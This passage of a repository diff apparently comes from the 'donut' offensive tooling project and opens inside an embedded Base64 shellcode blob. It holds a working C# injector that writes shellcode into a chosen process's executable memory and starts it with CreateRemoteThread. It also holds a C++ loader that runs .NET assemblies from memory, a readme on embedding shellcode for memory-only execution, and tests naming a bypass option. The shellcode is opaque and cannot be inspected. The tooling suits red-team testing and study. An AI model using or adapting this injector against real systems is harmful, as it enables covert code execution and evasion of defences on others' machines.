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";
14
15 static int pid = Process.GetCurrentProcess().Id;
16
17 static void Main(string[] args)
18 {
19 if (args.Length >= 1)
20 pid = Convert.ToInt32(args[0]);
21
22 Inject(x86, x64, pid);
23 }
24
25 [DllImport("kernel32.dll")]
26 public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
27
28 [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
29 public static extern IntPtr GetModuleHandle(string lpModuleName);
30
31 [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
32 static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
33
34 [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
35 static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
36 uint dwSize, uint flAllocationType, uint flProtect);
37
38 [DllImport("kernel32.dll", SetLastError = true)]
39 static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
40
41 [DllImport("kernel32.dll")]
42 static extern IntPtr CreateRemoteThread(IntPtr hProcess,
43 IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
44
45 const int PROCESS_CREATE_THREAD = 0x0002;
46 const int PROCESS_QUERY_INFORMATION = 0x0400;
47 const int PROCESS_VM_OPERATION = 0x0008;
48 const int PROCESS_VM_WRITE = 0x0020;
49 const int PROCESS_VM_READ = 0x0010;
50
51
52 const uint MEM_COMMIT = 0x00001000;
53 const uint MEM_RESERVE = 0x00002000;
54 const uint PAGE_READWRITE = 4;
55 const uint PAGE_EXECUTE_READWRITE = 0x40;
56
57 /// <summary>
58 /// Injects shellcode into the target process using CreateRemoteThread, using the correct version for the process's architecture.
59 /// </summary>
60 /// <param name="x86">Base64-encoded x86 shellcode.</param>
61 /// <param name="x64">Base64-encoded x64 shellcode</param>
62 /// <param name="procPID">The PID of the target process.</param>
63 /// <returns></returns>
64 public static int Inject(string x86, string x64, int procPID)
65 {
66
67 Process targetProcess = Process.GetProcessById(procPID);
68 Console.WriteLine(targetProcess.Id);
69
70 string s;
71
72 if (IsWow64Process(targetProcess) == true)
73 s = x86;
74 else
75 s = x64;
76
77 byte[] shellcode = Convert.FromBase64String(s);
78
79 IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
80
81 IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
82
83 UIntPtr bytesWritten;
84 WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)shellcode.Length, out bytesWritten);
85
86 CreateRemoteThread(procHandle, IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, IntPtr.Zero);
87
88 return 0;
89 }
90
91 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
92 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
93
94 /// <summary>
95 /// Checks whether the process is 64-bit.
96 /// </summary>
97 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
98 public static bool IsWow64Process(Process process)
99 {
100 bool retVal = false;
101 IsWow64Process(process.Handle, out retVal);
102 return retVal;
103 }
104 }
105 }
+36
-0
DonutTest/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DonutTest")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DonutTest")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("3c9a6b88-bed2-4ba8-964c-77ec29bf1846")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+18
-0
DonutTest/Readme.md less more
0 # DonutTest
1
2 A simple C# shellcode remote injector to use in testing donut. It contains both x86 and x64 versions of the shellcode, determines the architecture of the target process, and then injects the appropriate version into that process with CreateRemoteThread. The shellcode must be Base64-encoded and dropped into the code as a string. This ensures that it can be run entirely from memory.
3
4 You may Base64-encode your shellcode and copy it to your clipboard with the PowerShell below:
5
6 ```powershell
7 $filename = "C:\\Test\donut\\loader.bin"
8 [Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip
9 ```
10
11 ```
12 Usage:
13
14 DonutTest.exe [PID]
15
16 If no PID is specified, then DonutTest will inject the shellcode into itself.
17 ```
+5
-0
DonutTest/calc.js less more
0
1 var sh
2 sh = new ActiveXObject("Wscript.Shell")
3 sh.Run("calc.exe")
4 WScript.Quit()
+7
-0
DonutTest/calc.vbs less more
0
1 Dim sh
2 Set sh = CreateObject("Wscript.Shell")
3 Call sh.Run("calc.exe")
4 Set sh = Nothing
5 WScript.Quit()
6
+36
-0
DonutTest/dlltest.c less more
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiVoid(VOID) {
10 MessageBoxA(NULL, "Hello, World!", "Donut Test for VOID API", MB_OK);
11 }
12
13 __declspec(dllexport)
14 VOID APIENTRY DonutApiW(PWCHAR argv) {
15 MessageBoxW(NULL, argv, L"Donut Test for UNICODE strings", MB_OK);
16 }
17
18 __declspec(dllexport)
19 VOID APIENTRY DonutApiA(PCHAR argv) {
20 MessageBoxA(NULL, argv, "Donut Test for ANSI strings", MB_OK);
21 }
22
23 __declspec(dllexport)
24 BOOL APIENTRY DllMain(HMODULE hModule,
25 DWORD ul_reason_for_call,
26 LPVOID lpReserved) {
27 switch (ul_reason_for_call) {
28 case DLL_PROCESS_ATTACH:
29 case DLL_THREAD_ATTACH:
30 case DLL_THREAD_DETACH:
31 case DLL_PROCESS_DETACH:
32 break;
33 }
34 return TRUE;
35 }
+0
-56
DonutTest/hello.c less more
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
+146
-0
DonutTest/rundotnet.cpp less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <oleauto.h>
33 #include <mscoree.h>
34 #include <comdef.h>
35
36 #include <cstdio>
37 #include <cstdint>
38 #include <cstring>
39 #include <cstdlib>
40 #include <sys/stat.h>
41
42 #pragma comment(lib, "mscoree.lib")
43 #import "mscorlib.tlb" raw_interfaces_only
44
45 void rundotnet(void *code, size_t len) {
46 HRESULT hr;
47 ICorRuntimeHost *icrh;
48 IUnknownPtr iu;
49 mscorlib::_AppDomainPtr ad;
50 mscorlib::_AssemblyPtr as;
51 mscorlib::_MethodInfoPtr mi;
52 VARIANT v1, v2;
53 SAFEARRAY *sa;
54 SAFEARRAYBOUND sab;
55
56 printf("CorBindToRuntime(ICorRuntimeHost).\n");
57 hr = CorBindToRuntime(
58 NULL, // load latest runtime version available
59 NULL, // load workstation build
60 CLSID_CorRuntimeHost,
61 IID_ICorRuntimeHost,
62 (LPVOID*)&icrh);
63
64 if(FAILED(hr)) return;
65
66 printf("ICorRuntimeHost::Start()\n");
67 hr = icrh->Start();
68 if(SUCCEEDED(hr)) {
69 printf("ICorRuntimeHost::GetDefaultDomain()\n");
70 hr = icrh->GetDefaultDomain(&iu);
71 if(SUCCEEDED(hr)) {
72 printf("IUnknown::QueryInterface()\n");
73 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
74 if(SUCCEEDED(hr)) {
75 sab.lLbound = 0;
76 sab.cElements = len;
77 printf("SafeArrayCreate()\n");
78 sa = SafeArrayCreate(VT_UI1, 1, &sab);
79 if(sa != NULL) {
80 CopyMemory(sa->pvData, code, len);
81 printf("AppDomain::Load_3()\n");
82 hr = ad->Load_3(sa, &as);
83 if(SUCCEEDED(hr)) {
84 printf("Assembly::get_EntryPoint()\n");
85 hr = as->get_EntryPoint(&mi);
86 if(SUCCEEDED(hr)) {
87 v1.vt = VT_NULL;
88 v1.plVal = NULL;
89 printf("MethodInfo::Invoke_3()\n");
90 hr = mi->Invoke_3(v1, NULL, &v2);
91 mi->Release();
92 }
93 as->Release();
94 }
95 SafeArrayDestroy(sa);
96 }
97 ad->Release();
98 }
99 iu->Release();
100 }
101 icrh->Stop();
102 }
103 icrh->Release();
104 }
105
106 int main(int argc, char *argv[])
107 {
108 void *mem;
109 struct stat fs;
110 FILE *fd;
111
112 if(argc != 2) {
113 printf("usage: rundotnet <.NET assembly>\n");
114 return 0;
115 }
116
117 // 1. get the size of file
118 stat(argv[1], &fs);
119
120 if(fs.st_size == 0) {
121 printf("file is empty.\n");
122 return 0;
123 }
124
125 // 2. try open assembly
126 fd = fopen(argv[1], "rb");
127 if(fd == NULL) {
128 printf("unable to open \"%s\".\n", argv[1]);
129 return 0;
130 }
131 // 3. allocate memory
132 mem = malloc(fs.st_size);
133 if(mem != NULL) {
134 // 4. read file into memory
135 fread(mem, 1, fs.st_size, fd);
136 // 5. run the program from memory
137 rundotnet(mem, fs.st_size);
138 // 6. free memory
139 free(mem);
140 }
141 // 7. close assembly
142 fclose(fd);
143
144 return 0;
145 }
DonutTest/rundotnet.exe less more
Binary diff not shown
+0
-88
DonutTest/testcase.c less more
0
1
2 // just some simple test cases to use with donut library
3
4 #include "donut.h"
5
6 typedef struct _test_case_t {
7 int arch;
8 int bypass;
9 int inst_type;
10 char *domain;
11 char *cls;
12 char *method;
13 char *param;
14 char *file;
15 char *url;
16 char *runtime;
17 int err; // expected result based on test case
18 } test_case;
19
20 test_case tests[] = {
21 // nothing supplied
22 {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER},
23 // requesting x86 shellcode for x64 DLL
24 {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH},
25 // requesting x64 shellcode for x86 DLL
26 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH},
27 // supplying parameters for unmanaged DLL, but not function name
28 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM},
29 // supplying function name that can't be found in DLL
30 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION},
31 // supplying file that isn't recognized
32 {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID},
33 // .NET DLL assembly with no method provided
34 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS},
35 // .NET DLL assembly with no class provided
36 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS},
37 // .NET DLL with good parameters
38 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS},
39 // invalid URL
40 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL},
41 // invalid URL length
42 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH},
43 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH},
44 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS},
45 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll",
46 "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
47 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
48 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
49 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
50 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
51 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
52 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
53 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
54 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
55 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
56 "",DONUT_ERROR_URL_LENGTH},
57 };
58
59 int main(void)
60 {
61 DONUT_CONFIG c;
62 int err, i;
63
64 for(i=0; i<sizeof(tests)/sizeof(test_case); i++) {
65 memset(&c, 0, sizeof(c));
66
67 c.arch = tests[i].arch;
68 c.bypass = tests[i].bypass;
69 c.inst_type = tests[i].inst_type;
70
71 strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1);
72 strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1);
73 strncpy(c.method , tests[i].method, sizeof(c.method) - 1);
74 strncpy(c.param , tests[i].param, sizeof(c.param) - 1);
75 strncpy(c.file , tests[i].file, sizeof(c.file) - 1);
76 strncpy(c.url , tests[i].url, sizeof(c.url) - 1);
77 strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1);
78
79 printf("Test Case # %2i ", (i+1));
80 err = DonutCreate(&c);
81 DonutDelete(&c);
82
83 printf("returned %2i : %s\n",
84 err, err == tests[i].err ? "OK" : "FAILED");
85 }
86 return 0;
87 }
+2
-2
MANIFEST.in less more
22 include LICENSE
33 include version-release-notes.txt
44 recursive-include . *.c
5 recursive-include payload *
5 recursive-include loader *
66 recursive-include include *
77 recursive-include docs *
8 recursive-include lib *
8 recursive-include lib *
+12
-8
Makefile less more
0 donut:
1 gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
2 gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o
5 debug:
6 gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
0 donut: clean
1 gcc -Wunused-function -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c -odonut lib/aplib64.a
2 gcc -Wunused-function -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c format.c loader/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
5 debug: clean
6 gcc -Wunused-function -ggdb -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.a -odonut
7 hash:
8 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include hash.c loader/clib.c -ohash
9 encrypt:
10 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include encrypt.c loader/clib.c -oencrypt
711 clean:
8 rm *.o donut lib/libdonut.a lib/libdonut.so
12 rm -f loader.exe exe2h.exe exe2h loader32.exe loader64.exe donut.o hash.o encrypt.o format.o clib.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so
+21
-5
Makefile.mingw less more
0 donut:
1 x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
2 debug:
3 x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
0 CC32 := i686-w64-mingw32-gcc
